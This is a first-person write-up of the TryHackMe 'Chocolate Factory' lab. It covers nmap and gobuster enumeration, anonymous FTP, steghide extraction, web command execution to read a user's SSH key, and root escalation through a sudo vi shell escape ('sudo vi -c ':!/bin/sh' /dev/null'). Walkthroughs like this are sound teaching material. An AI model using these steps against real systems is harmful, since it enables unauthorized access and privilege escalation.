TryHackMe Chocolate Factory WriteUp

TryHackMe Chocolate Factory WriteUp

Hello and Welcome to my first writeup!

Reconnaissance and Enumeration

first we scan the machine using nmap using the command:

nmap -sV [IP HERE]

nmap scan

21/tcp  open  ftp        vsftpd 3.0.3

22/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp  open  http       Apache httpd 2.4.29 ((Ubuntu))

100/tcp open  newacct?

106/tcp open  pop3pw?

109/tcp open  pop2?

110/tcp open  pop3?

111/tcp open  rpcbind?

113/tcp open  ident?

119/tcp open  nntp?

125/tcp open  locus-map?

ftp enumeration

we login to ftp using username: “anonymous” and password: “anonymous”

in ftp found “gum_room.jpg”

used steghide to extract it:

steghide extract -sf gum_room.jpg

didnt put passphrase, b64.txt extracted.

found what looks like a /etc/shadow file. didnt find anything useful.

web enumeration

we open the webpage and find a login portal.

i used gobuster to enumerate directories.

"gobuster dir -u http://[IP HERE] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html"

gobuster: the name of the tool.
 
dir: specify we want to bruteforce directiories.

-u: specify the url

-w: specify the world list

-x: look for filees with exstinsions.

result:

/.php                 (Status: 403) [Size: 278]

/.html                (Status: 403) [Size: 278]

/index.html           (Status: 200) [Size: 1466]

/home.php             (Status: 200) [Size: 569]

/validate.php         (Status: 200) [Size: 93]

Initial Access:

we navigate to home.php, you can run commands in it.

we try the whoami command

it works! we search for users in the home directory using "ls /home"

found user charlie, we list the files, using "ls /home/charlie"

"cat /home/charlie/teleport"

Bingo! found ssh private key.

i copied it into id_rsa file then give it the right permissions using chmod +600 test if we can login using ssh to the user. the key works!

in /var/www/html i found a file named key_rev_key, i try to run it:

changed the permissions using chmod +x key_rev_key

since its a binary, we can check the file contents using strings key_rev_key

got the key!

b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='

in /var/www/html we cat validate.php:

run validate.php , bingo we got charlies password :)

login to charlies account using “su charlie”.

user.txt

Privilege Escalation:

The first thing you should check for is sudo -l, result:

Matching Defaults entries for charlie on chocolate-factory:
   env_reset, mail_badpass,
   
   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    
   (ALL : !root) NOPASSWD: /usr/bin/vi

in gtfobins, vi -c ':!/bin/sh' /dev/null

i ran it with sudo so if it works we could get root privileges sudo vi -c ':!/bin/sh' /dev/null

charlie@chocolate-factory:/home/charlie$ sudo vi -c ':!/bin/sh' /dev/null

pwned!!

Finding the root flag

we find root.py we run it , enter the key we obtained before , and it shows us the root flag.

Happy Pwning :)

PreviousTryhackmeNextTryHackMe Blog WriteUp

Last updated